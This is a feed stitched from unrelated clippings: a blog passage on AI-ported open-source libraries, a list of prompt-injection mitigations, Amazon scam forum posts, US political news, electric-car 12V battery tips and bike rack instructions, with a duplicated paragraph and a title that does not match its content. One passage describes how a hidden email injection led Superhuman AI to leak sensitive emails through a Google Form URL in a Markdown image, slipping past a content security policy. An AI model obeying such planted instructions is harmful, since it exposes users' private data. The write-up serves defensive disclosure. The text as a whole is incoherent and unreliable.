Public Feed

AUX18L Auxiliary and Start/Stop Battery, by East Penn

the short version is that it’s now possible to point a coding agent at some other open source project and effectively tell it “port this to language X and make sure the tests still pass” and have it do exactly that.

the short version is that it’s now possible to point a coding agent at some other open source project and effectively tell it “port this to language X and make sure the tests still pass” and have it do exactly that.

Does this library represent a legal violation of copyright of either the Rust library or the Python one? #

I decided that the right thing to do here was to keep the open source license and copyright statement from the Python library author and treat what I had built as a derivative work, which is the entire point of open source.

Even if this is legal, is it ethical to build a library in this way? #

After sitting on this for a while I’ve come down on yes, provided full credit is given and the license is carefully considered. Open source allows and encourages further derivative works! I never got upset at some university student forking one of my projects on GitHub and hacking in a new feature that they used. I don’t think this is materially different, although a port to another language entirely does feel like a slightly different shape.

The much bigger concern for me is the impact of generative AI on demand for open source. The recent Tailwind story is a visible example of this—while Tailwind blamed LLMs for reduced traffic to their documentation resulting in fewer conversions to their paid component library, I’m suspicious that the reduced demand there is because LLMs make building good-enough versions of those components for free easy enough that people do that instead.

Prevention and Mitigation Strategies

Prompt injection vulnerabilities are possible due to the nature of generative AI. Given the stochastic influence at the heart of the way models work, it is unclear if there are fool-proof methods of prevention for prompt injection. However, the following measures can mitigate the impact of prompt injections:

1. Constrain model behavior

Provide specific instructions about the model’s role, capabilities, and limitations within the system prompt. Enforce strict context adherence, limit responses to specific tasks or topics, and instruct the model to ignore attempts to modify core instructions. 2. Define and validate expected output formats

Specify clear output formats, request detailed reasoning and source citations, and use deterministic code to validate adherence to these formats. 3. Implement input and output filtering

Define sensitive categories and construct rules for identifying and handling such content. Apply semantic filters and use string-checking to scan for non-allowed content. Evaluate responses using the RAG Triad: Assess context relevance, groundedness, and question/answer relevance to identify potentially malicious outputs. 4. Enforce privilege control and least privilege access

Provide the application with its own API tokens for extensible functionality, and handle these functions in code rather than providing them to the model. Restrict the model’s access privileges to the minimum necessary for its intended operations. 5. Require human approval for high-risk actions

Implement human-in-the-loop controls for privileged operations to prevent unauthorized actions. 6. Segregate and identify external content

Separate and clearly denote untrusted content to limit its influence on user prompts. 7. Conduct adversarial testing and attack simulations\

Perform regular penetration testing and breach simulations, treating the model as an untrusted user to test the effectiveness of trust boundaries and access controls.

Top 10 Risk & Mitigations for LLMs and Gen AI Apps

When asked to summarize the user’s recent mail, a prompt injection in an untrusted email manipulated Superhuman AI to submit content from dozens of other sensitive emails (including financial, legal, and medical information) in the user’s inbox to an attacker’s Google Form.

the injection in the email is hidden using white-on-white text, but the attack does not depend on the concealment! The malicious email could simply exist in the victim’s inbox unopened, with a plain-text injection.

This is a quite common use case for email AI companions. The user has asked about emails from the last hour, so the AI retrieves those emails. One of those emails contains the malicious prompt injection, and others contain sensitive private information.

The hidden prompt injection manipulates the AI to do the following:

Take the data from the email search results

Populate the attacker’s Google Form URL with the data from the email search results in the “entry” parameter

Output a Markdown image that contains this Google Form URL

Superhuman has a CSP in place - which prevents outbound requests to malicious domains; however, they have allowed requests to docs.google.com.

The AI Notetaker you’ll wish was in your last customer meeting.

Amazon letting sellers post ads for ~$3K graphics cards, and then the seller ships them fanny packs. Confirmed multiple times and in reviews.

Almost too tempting...

EDIT: 🤣🤣 Look at seller reviews: https://files.catbox.moe/wg1oqi.png

DONT DO IT.

Per a previous post, I actually tried it due to the FBA return policy, cause I was putting it on an empty amz card, and cause I was bored. 🥱😏

you get a Fanny pack

I recorded the shit out of opening the package and reported it as fraud. A few people were doing the exact same thing (ordering it it case it was real, and recording opening of the package to CYA) cause we were also bored 😂

out of the norm, you have to take detailed pics and the charge stays on your card until they receive Fanny pack (yes you have to send it back 😂🤣) and ‘inspect it’ I guess due to the massive number of returns and fraud reports+ add to that the normal refund period. Not even a credit to your account would be instant once you return it to a drop off. 😕

Clearly a waste of time but will mess you up serious if you use a debit card or if there is any sort of delay that results in them receiving it late, and taking too long to process it.

Amazon will not make you whole on this. Maybe they give you a shitty coupon (some people reported a $10 credit 😒) and it’s not worth your time.

https://imgur.com/a/dHlrKnh

https://imgur.com/a/tYKVyHz

You'd think Amazon would suspend the seller or remove the listing the moment 20+ people all reported it and returned it for the same reason instead of removing the reviews and letting people get scammed (and then dragging their feet getting the defrauded people their money back)

I just received my AORUS RTX 5090 from Amazon, sold and shipped directly by Amazon as brand new. When I opened the box, it was clearly an open-box item and contained only a PCB with no GPU chip or VRAM installed. How does Amazon ship something like this as new?

I saw that the other day. Was tempted, but then when I checked the store all the reviewers were 1 stars saying that they got a fanny pack instead of what they ordered. Amazon, being Amazon had removed or crossed the review out because it was fulfilled by them not the store, basically allowing them to defraud people

One day the mighty data centre could be toppled into obsolescence by the humble smartphone, said Perplexity CEO Aravind Srinivas on a recent podcast.

Apple's AI system, Apple Intelligence, already runs some features on specialised chips inside the firm's latest range of products.

Microsoft's Copilot+ laptops also include on-device AI processing.

a few years ago I heard about a tiny data centre, the size of a washing machine, that was being operated in Devon, UK. In addition to its computing power, the heat it was releasing was warming a public swimming pool.

He thinks every public building should instead house a small data centre, working in a large network with each other where required, and providing heating as a by-product.

In just the past week, President Donald Trump has ordered defense companies to halt dividends and stock buybacks, and limited executive compensation to $5 million a year; ordered Fannie Mae and Freddie Mac to buy $200 billion of mortgage-backed securities; ordered an array of energy firms to invest in Venezuelan oil infrastructure, called for a 10 percent cap on credit card interest rates; announced steps to ban institutional purchases of single-family homes; and opened a criminal investigation into Jerome Powell's handling of Federal Reserve building renovations in an attempt to influence monetary policy.

good 12v battery replacement vid

We used the Remy 12V Battery AUX18L

In the US it's important to know that you can use the: Energizer TX24HL AGM Motorcycle and ATV 12V Battery​ as a replacement for the 12 volt. It costs $105 at Amazon. Its been working flawlessly since November of 2023. It may be important to note that in my 2014 the entire car went dead and I had to watch a YouTube to find the emergency hood pull. I had bought the car from a dealer in 2017 so my original 12 volt was between 7 and 9 years old. Absolutely amazing.

I’d caution slightly. This battery seems to be a different physical size than the OEM, and the terminals look different as well. I like this one, because it is a one for one replacement: https://remybattery.com/start-stop-aux18l-auxiliary-battery.html

I worked with Ohmmu to ensure that its LFP battery would work well with an i3. The i3 DC-DC converter's output voltage is ideal for an LFP battery. The 0.5V higher resting voltage of Ohmmu's LFP isn't a problem with an i3's 12V electronics because 12V components are designed work well with the 14.0+ output voltage of the DC-DC converter. The higher resting voltage and the much more flat voltage vs. charge level curve of a LFP battery means that the risk of all of the spurious DTC's being stored when the OEM battery's voltage drops too low when it fails isn't as great with a LFP battery. My Ohmmu LFP battery has been in our former 2019 and current 2021 i3's for about a year without any problems.

If your car still has its original 12 volt battery, your problems may be caused by a 12 volt battery failure. They tend to fail within 4 or 5 years, and, when they do, the car becomes completely inoperable.

You'll need roughly 12" of space per bike, plus 12" on either side of the bikes on the ends. For example, my 5 bikes needed ~7 feet of wall space. For my area, I used two 8 foot long 2x4s and cut them each down to roughly 84". The upper 2x4 should be mounted roughly 14" above the lower 2x4. This will stagger your bikes so that their handlebars don't clash.

bicycle rack

Lobsters was created by joshua stein with careful design touches to encourage a healthy community:

a tagging system to categorize and filter submissions, a user invitation tree to combat spam, flag explanations to curb punishing disagreement, a strong commitment to transparency, and many more features that have been added over the years.

Trump has been impeached twice, though the Senate acquitted him both times.

In December 2019, the House voted to impeach Trump on two articles, one charging him with abuse of power by asking Ukrainian officials to investigate his political opponent and another that he obstructed the congressional investigation into the matter. In February 2020, the Senate voted to acquit the president, and Sen. Mitt Romney, R-Utah, was the only Republican to cross party lines in voting to convict.

In January 2021, the House voted to impeach Trump again, charging the president with "incitement to insurrection" related to the events at the U.S. Capitol on Jan. 6, 2021. 10 Republicans broke ranks and voted with Democrats to impeach Trump. Only two of those 10 lawmakers are still in office, and one of them has said he will not seek re-election in 2026. The others retired from Congress or lost their races.

The Senate trial occurred after Trump left office, and some Republicans found it unnecessary since he was no longer in power. A majority voted to convict with seven Republicans crossing party lines, but the 57-43 vote fell short of the two-thirds majority needed for a conviction.

Republican Sen. Thom Tillis (N.C.), a senior member of the Senate Banking Committee, is questioning the “credibility” of the Department of Justice’s investigation of Federal Reserve Chair Jerome Powell and threatening to oppose President Trump’s nominees to the central bank until the matter is resolved.